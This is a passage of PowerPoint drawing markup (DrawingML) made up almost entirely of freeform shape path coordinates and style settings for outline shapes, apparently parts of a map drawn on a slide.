                      <a:pt x="397" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="408" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="412" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="417" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="423" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="428" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="428" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="437" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="440" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="444" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="460" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="476" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="481" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="481" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="485" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="490" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="500" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="507" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="519" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="533" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="537" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="539" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="542" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="548" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="554" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="558" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="569" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="576" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="581" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="594" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="602" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="608" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="613" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="631" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="634" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="639" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="638" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="641" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="643" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="647" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="648" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="644" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="640" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="638" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="638" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="638" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="636" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="634" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="622" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="622" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="621" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="615" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="595" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="579" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="575" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="570" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="569" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="574" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="569" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="561" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="555" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="534" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="529" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="534" y="265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="537" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="537" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="540" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="542" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="543" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="534" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="534" y="312"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="320"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36409" name="Freeform 141"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3448" y="2212"/>
                <a:ext cx="92" cy="74"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 59 w 92"/>
                  <a:gd name="T1" fmla="*/ 71 h 74"/>
                  <a:gd name="T2" fmla="*/ 53 w 92"/>
                  <a:gd name="T3" fmla="*/ 63 h 74"/>
                  <a:gd name="T4" fmla="*/ 54 w 92"/>
                  <a:gd name="T5" fmla="*/ 57 h 74"/>
                  <a:gd name="T6" fmla="*/ 59 w 92"/>
                  <a:gd name="T7" fmla="*/ 52 h 74"/>
                  <a:gd name="T8" fmla="*/ 53 w 92"/>
                  <a:gd name="T9" fmla="*/ 47 h 74"/>
                  <a:gd name="T10" fmla="*/ 40 w 92"/>
                  <a:gd name="T11" fmla="*/ 52 h 74"/>
                  <a:gd name="T12" fmla="*/ 31 w 92"/>
                  <a:gd name="T13" fmla="*/ 60 h 74"/>
                  <a:gd name="T14" fmla="*/ 30 w 92"/>
                  <a:gd name="T15" fmla="*/ 57 h 74"/>
                  <a:gd name="T16" fmla="*/ 32 w 92"/>
                  <a:gd name="T17" fmla="*/ 55 h 74"/>
                  <a:gd name="T18" fmla="*/ 30 w 92"/>
                  <a:gd name="T19" fmla="*/ 50 h 74"/>
                  <a:gd name="T20" fmla="*/ 26 w 92"/>
                  <a:gd name="T21" fmla="*/ 47 h 74"/>
                  <a:gd name="T22" fmla="*/ 21 w 92"/>
                  <a:gd name="T23" fmla="*/ 44 h 74"/>
                  <a:gd name="T24" fmla="*/ 17 w 92"/>
                  <a:gd name="T25" fmla="*/ 39 h 74"/>
                  <a:gd name="T26" fmla="*/ 22 w 92"/>
                  <a:gd name="T27" fmla="*/ 37 h 74"/>
                  <a:gd name="T28" fmla="*/ 19 w 92"/>
                  <a:gd name="T29" fmla="*/ 33 h 74"/>
                  <a:gd name="T30" fmla="*/ 14 w 92"/>
                  <a:gd name="T31" fmla="*/ 24 h 74"/>
                  <a:gd name="T32" fmla="*/ 14 w 92"/>
                  <a:gd name="T33" fmla="*/ 19 h 74"/>
                  <a:gd name="T34" fmla="*/ 10 w 92"/>
                  <a:gd name="T35" fmla="*/ 16 h 74"/>
                  <a:gd name="T36" fmla="*/ 7 w 92"/>
                  <a:gd name="T37" fmla="*/ 12 h 74"/>
                  <a:gd name="T38" fmla="*/ 15 w 92"/>
                  <a:gd name="T39" fmla="*/ 9 h 74"/>
                  <a:gd name="T40" fmla="*/ 24 w 92"/>
                  <a:gd name="T41" fmla="*/ 15 h 74"/>
                  <a:gd name="T42" fmla="*/ 28 w 92"/>
                  <a:gd name="T43" fmla="*/ 15 h 74"/>
                  <a:gd name="T44" fmla="*/ 33 w 92"/>
                  <a:gd name="T45" fmla="*/ 16 h 74"/>
                  <a:gd name="T46" fmla="*/ 29 w 92"/>
                  <a:gd name="T47" fmla="*/ 9 h 74"/>
                  <a:gd name="T48" fmla="*/ 27 w 92"/>
                  <a:gd name="T49" fmla="*/ 3 h 74"/>
                  <a:gd name="T50" fmla="*/ 31 w 92"/>
                  <a:gd name="T51" fmla="*/ 0 h 74"/>
                  <a:gd name="T52" fmla="*/ 34 w 92"/>
                  <a:gd name="T53" fmla="*/ 1 h 74"/>
                  <a:gd name="T54" fmla="*/ 40 w 92"/>
                  <a:gd name="T55" fmla="*/ 6 h 74"/>
                  <a:gd name="T56" fmla="*/ 42 w 92"/>
                  <a:gd name="T57" fmla="*/ 12 h 74"/>
                  <a:gd name="T58" fmla="*/ 52 w 92"/>
                  <a:gd name="T59" fmla="*/ 14 h 74"/>
                  <a:gd name="T60" fmla="*/ 58 w 92"/>
                  <a:gd name="T61" fmla="*/ 8 h 74"/>
                  <a:gd name="T62" fmla="*/ 67 w 92"/>
                  <a:gd name="T63" fmla="*/ 4 h 74"/>
                  <a:gd name="T64" fmla="*/ 72 w 92"/>
                  <a:gd name="T65" fmla="*/ 12 h 74"/>
                  <a:gd name="T66" fmla="*/ 76 w 92"/>
                  <a:gd name="T67" fmla="*/ 22 h 74"/>
                  <a:gd name="T68" fmla="*/ 81 w 92"/>
                  <a:gd name="T69" fmla="*/ 27 h 74"/>
                  <a:gd name="T70" fmla="*/ 89 w 92"/>
                  <a:gd name="T71" fmla="*/ 29 h 74"/>
                  <a:gd name="T72" fmla="*/ 92 w 92"/>
                  <a:gd name="T73" fmla="*/ 34 h 74"/>
                  <a:gd name="T74" fmla="*/ 85 w 92"/>
                  <a:gd name="T75" fmla="*/ 32 h 74"/>
                  <a:gd name="T76" fmla="*/ 79 w 92"/>
                  <a:gd name="T77" fmla="*/ 34 h 74"/>
                  <a:gd name="T78" fmla="*/ 77 w 92"/>
                  <a:gd name="T79" fmla="*/ 42 h 74"/>
                  <a:gd name="T80" fmla="*/ 75 w 92"/>
                  <a:gd name="T81" fmla="*/ 50 h 74"/>
                  <a:gd name="T82" fmla="*/ 75 w 92"/>
                  <a:gd name="T83" fmla="*/ 53 h 74"/>
                  <a:gd name="T84" fmla="*/ 73 w 92"/>
                  <a:gd name="T85" fmla="*/ 59 h 74"/>
                  <a:gd name="T86" fmla="*/ 70 w 92"/>
                  <a:gd name="T87" fmla="*/ 56 h 74"/>
                  <a:gd name="T88" fmla="*/ 69 w 92"/>
                  <a:gd name="T89" fmla="*/ 61 h 74"/>
                  <a:gd name="T90" fmla="*/ 68 w 92"/>
                  <a:gd name="T91" fmla="*/ 66 h 74"/>
                  <a:gd name="T92" fmla="*/ 5 w 92"/>
                  <a:gd name="T93" fmla="*/ 45 h 74"/>
                  <a:gd name="T94" fmla="*/ 10 w 92"/>
                  <a:gd name="T95" fmla="*/ 46 h 74"/>
                  <a:gd name="T96" fmla="*/ 14 w 92"/>
                  <a:gd name="T97" fmla="*/ 49 h 74"/>
                  <a:gd name="T98" fmla="*/ 20 w 92"/>
                  <a:gd name="T99" fmla="*/ 50 h 74"/>
                  <a:gd name="T100" fmla="*/ 23 w 92"/>
                  <a:gd name="T101" fmla="*/ 54 h 74"/>
                  <a:gd name="T102" fmla="*/ 25 w 92"/>
                  <a:gd name="T103" fmla="*/ 63 h 74"/>
                  <a:gd name="T104" fmla="*/ 17 w 92"/>
                  <a:gd name="T105" fmla="*/ 62 h 74"/>
                  <a:gd name="T106" fmla="*/ 10 w 92"/>
                  <a:gd name="T107" fmla="*/ 56 h 74"/>
                  <a:gd name="T108" fmla="*/ 2 w 92"/>
                  <a:gd name="T109" fmla="*/ 46 h 74"/>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2"/>
                  <a:gd name="T166" fmla="*/ 0 h 74"/>
                  <a:gd name="T167" fmla="*/ 92 w 92"/>
                  <a:gd name="T168" fmla="*/ 74 h 74"/>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2" h="74">
                    <a:moveTo>
                      <a:pt x="66" y="74"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="61" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="74"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="0" y="44"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
